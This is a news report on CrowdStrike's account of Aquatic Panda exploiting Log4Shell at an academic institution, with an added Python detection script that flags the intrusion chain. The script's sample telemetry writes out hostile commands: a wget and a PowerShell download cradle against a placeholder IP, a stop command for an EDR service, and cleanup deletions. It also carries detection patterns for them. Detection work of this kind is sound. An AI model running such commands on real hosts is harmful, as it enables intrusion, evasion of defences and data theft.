30 December 2021

China-based cyber spies breached an academic institution through Log4j flaw


A China-linked cyber-espionage group tracked as Aquatic Panda has recently been spotted exploiting the Log4Shell vulnerability (CVE-2021-44228) to break into a large academic institution.

According to the latest report from CrowdStrike’s Falcon OverWatch team, the adversary used a modified version of the Log4Shell exploit (initially published on GitHub on December 13) to gain access to a VMware Horizon instance that ran the vulnerable Log4j library at an unnamed academic institution.

The objective of the attack is unknown because the intrusion was disrupted before it could progress.

“OverWatch uncovered suspicious activity stemming from a Tomcat process running under a vulnerable VMware Horizon instance at a large academic institution, leading to the disruption of an active hands-on intrusion,” the team said.

The threat actor first performed connectivity checks via DNS lookups for a subdomain; the lookups were executed under the Apache Tomcat service running on the VMware Horizon instance. The attackers then executed a series of Linux commands on the Windows host, again under the Apache Tomcat service, in an attempt to retrieve additional tools hosted on remote infrastructure.

Aquatic Panda then performed reconnaissance from the host to determine its current privilege level and to collect system and domain details. The adversary also attempted to discover and stop a third-party endpoint detection and response (EDR) service.

The hackers then downloaded additional scripts and executed a Base64-encoded command via PowerShell to retrieve malware from their toolkit. The OverWatch team also observed multiple attempts at credential harvesting. The threat actor used WinRAR to compress the resulting memory dump in preparation for exfiltration and deleted all executables from the ProgramData and Windows\Temp directories to cover their tracks.
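The host-side chain described above (a Tomcat process spawning shells, DNS connectivity checks, Linux commands on a Windows box, encoded PowerShell, service discovery and stop, archiving, and cleanup in ProgramData and Windows\Temp) is exactly the kind of sequence that process-creation telemetry can catch. The Python below is an added example, not code from the page or from CrowdStrike: it tags constructed process-creation events (Sysmon Event ID 1 shape) with each behaviour, decodes the `-EncodedCommand` argument (Base64 over UTF-16LE, a detail that trips up naive decoders), and raises an alert when the web server spawned a shell and at least two follow-on behaviours appear on the same host. The process name `ws_TomcatService.exe`, the callback domain, the 203.0.113.10 address, the EDR service name and all sample events are assumptions or constructed data.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    """Process-creation record in the shape of Sysmon Event ID 1 / EDR telemetry."""
    parent_image: str
    image: str
    command_line: str


# ws_TomcatService.exe is assumed here to be the Tomcat service wrapper on a Horizon server.
WEB_SERVER_RE = re.compile(r"(ws_tomcatservice|tomcat\d*|javaw?)\.exe$", re.I)
SHELL_RE = re.compile(r"(cmd|powershell|pwsh|bash|sh|wsl)\.exe$", re.I)
ARCHIVE_RE = re.compile(r"(rar|winrar|7z)\.exe$", re.I)
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Command-line behaviours from the chain, checked in this order.
COMMAND_LINE_TAGS = [
    ("dns_connectivity_check", re.compile(r"\b(nslookup|Resolve-DnsName)\b", re.I)),
    # Unix tools appearing as a command token on a Windows host.
    ("unix_command_on_windows", re.compile(r"(?:^|[\s\"'&|;])(bash|sh|wget|chmod|uname)(?=\s|$)", re.I)),
    ("host_domain_recon", re.compile(r"\b(whoami|systeminfo|net\s+(?:group|user)|nltest|ipconfig)\b", re.I)),
    ("service_discovery", re.compile(r"\b(sc(?:\.exe)?\s+query|tasklist|Get-Service|wmic\s+service)\b", re.I)),
    ("service_stop", re.compile(r"\b(sc(?:\.exe)?\s+(?:stop|delete|config)|net\s+stop|Stop-Service|taskkill)\b", re.I)),
    ("cleanup_in_staging_dirs", re.compile(r"\b(del|erase|Remove-Item|rm)\b.*\\(ProgramData|Windows\\Temp)\\", re.I)),
]


def decode_encoded_powershell(command_line: str) -> Optional[str]:
    """Plaintext of a powershell -EncodedCommand argument, or None if there is none.
    The argument is Base64 over UTF-16LE, not UTF-8; decoding it as UTF-8 leaves
    interleaved NUL bytes and defeats naive string matching on the result."""
    m = ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev: ProcEvent) -> List[str]:
    """Tag one event with the behaviours from the intrusion chain it exhibits."""
    tags = []
    if WEB_SERVER_RE.search(ev.parent_image) and SHELL_RE.search(ev.image):
        tags.append("webserver_spawned_shell")
    tags += [tag for tag, rx in COMMAND_LINE_TAGS if rx.search(ev.command_line)]
    if decode_encoded_powershell(ev.command_line) is not None:
        tags.append("encoded_powershell")
    if ARCHIVE_RE.search(ev.image):
        tags.append("archive_staging")
    return tags


def triage(events: List[ProcEvent]) -> Dict[str, object]:
    """Summarise one host's events. Alert when the web server spawned a shell and
    at least two further behaviours from the chain appear on the same host."""
    seen: Dict[str, List[str]] = {}
    decoded: List[str] = []
    for ev in events:
        for tag in classify(ev):
            seen.setdefault(tag, []).append(ev.command_line)
        plain = decode_encoded_powershell(ev.command_line)
        if plain is not None:
            decoded.append(plain)
    follow_on = set(seen) - {"webserver_spawned_shell"}
    alert = "webserver_spawned_shell" in seen and len(follow_on) >= 2
    return {"techniques": sorted(seen), "decoded_powershell": decoded, "alert": alert}


# Constructed sample telemetry, not real logs; paths, domain, IP and service name are placeholders.
TOMCAT = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_DOWNLOAD_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2.ps1')"
ENCODED = base64.b64encode(SAMPLE_DOWNLOAD_CRADLE.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    ProcEvent(TOMCAT, CMD, "cmd.exe /c nslookup a1b2c3.callback.example"),
    ProcEvent(TOMCAT, CMD, 'cmd.exe /c bash -c "wget http://203.0.113.10/tools.sh"'),
    ProcEvent(CMD, CMD, 'cmd.exe /c whoami /priv & systeminfo & net group "Domain Admins" /domain'),
    ProcEvent(CMD, r"C:\Windows\System32\sc.exe", "sc query SomeEDRAgent"),
    ProcEvent(CMD, r"C:\Windows\System32\sc.exe", "sc stop SomeEDRAgent"),
    ProcEvent(CMD, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc " + ENCODED),
    ProcEvent(CMD, r"C:\ProgramData\rar.exe", r"rar.exe a C:\ProgramData\m.rar C:\ProgramData\m.dmp"),
    ProcEvent(CMD, CMD, r"cmd.exe /c del /q C:\ProgramData\*.exe & del /q C:\Windows\Temp\*.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{classify(ev) or ['-']}: {ev.command_line[:60]}")
    print(triage(SAMPLE_EVENTS))
```

Two design points worth noting. The parent/child pairing (web-server process spawning cmd.exe or powershell.exe) is the highest-value single signal here, because a Tomcat service has no legitimate reason to launch a shell; the remaining tags are individually noisy (nslookup, whoami and sc query all occur in normal administration), which is why the alert requires the parent/child signal plus corroborating behaviours rather than any one tag. The Unix-tool match deliberately requires the tool name to be a command token, so a filename such as tools.sh does not trip it.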

“Based on the actionable intelligence provided by OverWatch, the victim organization was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host,” CrowdStrike said.
